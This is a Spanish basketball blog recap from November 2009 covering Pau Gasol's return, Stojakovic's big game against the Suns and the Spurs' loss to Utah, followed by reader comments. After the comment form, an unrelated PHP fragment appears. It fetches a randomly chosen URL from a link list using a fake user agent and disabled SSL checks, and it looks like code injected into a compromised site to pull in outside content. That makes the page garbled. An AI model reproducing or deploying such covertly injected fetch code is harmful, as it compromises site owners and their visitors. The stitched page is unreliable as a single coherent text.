La Crónica (19/11/2009)

20 de November de 2009 por Viva_Dirk

Volvió Pau Gasol y lo hizo a lo grande, con el enésimo doble-doble, siendo el hombre más destacado de su equipo. Los Lakers, sin sudar demasiado, dieron buena cuenta de unos Bulls poco convencidos de sus posibilidades. Kobe agradeció la vuelta de Pau rozando el triple doble y rebajando minutos y protagonismo. Odom la agradeció ,volviendo a su rol más relajado de suplente y rematando el partido y Artest lo agradeció entendiéndose muy bien con él, logrando más espacios para anotar y secando a Luol Deng. El que menos agradeció el debut fue Bynum, quien hizo uno de sus partidos más modestos de lo que llevamos de temporada. Por cierto, noche histórica para Kobe que superó a Kareem en la lista de máximos anotadores amarillos. No tardará mucho en alcanzar a Jerry West.

Pero no terminó siendo Gasol lo más noticioso de la jornada y es que Stojakovic la armó en la visita de los Suns a New Orleans cosiéndolos a triples, muy bien apoyado por secundarios habituales como Darren Collison, Devin Brown y Marcus Thornton. Qué buena noticia sería para los Hornets encontrar ayuda de debajo de las piedras… y ya de paso, recuperar la que cabría esperar por parte de West, Posey u Okafor, más apariciones más frecuentes de Peja. El caso es que los Suns han sentido demasiado pronto el vértigo de la cabeza.

Por su parte, los Jazz ahondaron en la crisis de los Spurs ganándoles a domicilio por primera vez en el nuevo siglo. Richard Jefferson y George Hill todavía no dan a este equipo lo que Parker&Ginobili y a los Spurs les faltó la pegada que tenía Utah con Deron, Boozer, Millsap y Kirilenko destacado. A Duncan nada más le faltó tocar la pandereta, siendo el líder de su equipo en todas las categorías estadísticas. Conviene que ambos equipos comiencen a ponerse las pilas no sea que pronto les crezcan los enanos.

PREMIOS

MVP: 24 puntos, 13 rebotes, 3 asistencias, un tapón, 9 de 15 en tiros y un perfecto 6 de 6 en tiros libres. Así es como se debe volver de una lesión y así lo hizo el gran Pau Gasol en la victoria de los Lakers sobre Chicago. Deron aprovechó la ausencia de Parker para anotar 21 puntos y repartir 10 asistencias.

Rookie: Marcus Thornton está contando con minutos desde que se marchó Byron Scott y ayer nos dejó 19 puntos en 20 minutos para ayudar a doblegar a los Suns. El otro rookie de New Orleans, Darren Collison, también hizo un buen partido con 15 puntos, 5 rebotes y 5 asistencias. Blair y Maynor tuvieron actuaciones discretas.

Sorpresa: No sabemos de cuando data el último doble-doble de Stojakovic pero seguro que hace muchos partidos. Ayer ante el mejor equipo del Oeste se fue a nada menos que 25 puntos ,con 7 de 11 en triples, y 13 rebotes, 5 de ellos ofensivos.

Decepción: Luol Deng estuvo 36 minutos en cancha para anotar 6 puntos, coger 6 rebotes, perder 2 balones y anotar 3 de sus 11 lanzamientos. Teniendo en cuenta que su rendimiento es en muchas ocasiones el termómetro de los Bulls, ayer hizo mucho frío para ellos. Tampoco hizo demasiados méritos David West con 6 puntos, 4 rebotes y 5 asistencias con un 2 de 11 en tiros. Aún así su equipo ganó.

Esfuerzo en vano: Tim Duncan se encontró solo ante el peligro anoche. No bastaron sus 21 puntos, 9 rebotes y 5 asistencias para tumbar a los Jazz. Noah sigue callando bocas. Anoche, con Pau Gasol enfrente, rellenó del siguiente modo la hoja de estadísticas: 12 puntos, 15 rebotes, 4 asistencias, 4 robos y 2 tapones.

RAZONES PARA TRASNOCHAR

Esta próxima madrugada juegan Wade, LeBron, Nowitzki, Durant, Roy, Melo… pero nuestras miradas prestarán especial atención al partidazo que acogerá el TD Garden a partir de las 2h00. Los dos últimos campeones del Este y dos de las plantillas con más calidad de la NBA, Magic y Celtics, se enfrentan con el objetivo de dar caza a los Hawks, quienes por su parte defienden el mejor balance de la liga desde la 1h30 en su casa ante los Rockets.

Comenta

4 comentarios a esta entrada

  1. sergio dice:
    #1

    Partidazo de Gasol sin esforzarse demasiado. Puntos faciles bajo la canasta simplemente por colocacion e inteligencia. Dice que estaba cansado al acabar el partido pero su intensidad ha sido la justa para ir adaptandose. Esto pinta bien.

    Curiosa la estadistica de Bryant. Este año deberia superar tambien a Jerry West. Supongo que le quedan aun unos 8000 puntos por meter en la liga.. unos 24 puntos durante cuatro años los veo mas que posibles no?? Deberia terminar entre los 5-6 maximos anotadores de la historia. Su juego depende menos de su fisico que el de otros asi que no deberia ser tan dificil.

    Estoy empezando a dudar de los Spurs. Supongo que con el equipo al completo volveran a ser ganadores… pero empiezo a ver el territorio algo vacio para quitarle la Conferencia oeste a “los del lago”.

    Se lesiona Paul y van 2-1 desde entonces… alguien me lo explica??

      Citar

  2. Viva_Dirk dice:
    #2

    Este año y el que viene seguramente seguirá por encima de los 25 puntos, luego ya dependerá de los compañeros que tenga y lo capaces que sean de tomar las riendas. Espero que al final de su carrera esté 5º en puntos totales y el 4º puesto no demasiado lejos. Eso siempre que no alargue su carrera hasta los 37-38, que no me extrañaría, y en cuyo caso podria acercarse a Jordan.

    Lo de los Hornets es un caso rarísimo, de Pedja la verdad es que no se puede esperar demasiado, con el a un nivel decente y fino en el tiro de 3, deberian volver a ser un rival incómodo.

      Citar

  3. Love Denise dice:
    #3

    creo que gasol no deberia haber jugado tanto (35min) despues de llevar 2 meses sin hacerlo, ni que fuera un partido de la final …
    yo, en lugar de bryant, preferiría ganar 2-3 anillos más, antes que acabar 4º o 5º como máximo anotador.

    partidazo esta noche el boston-magic, espero que los de florida arrasen a los verdes.

      Citar

  4. arivas dice:
    #4

    El boston-orlando lo ponen los de cautro en abierto, pero en lugar de a las 2, en diferido a las 3.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>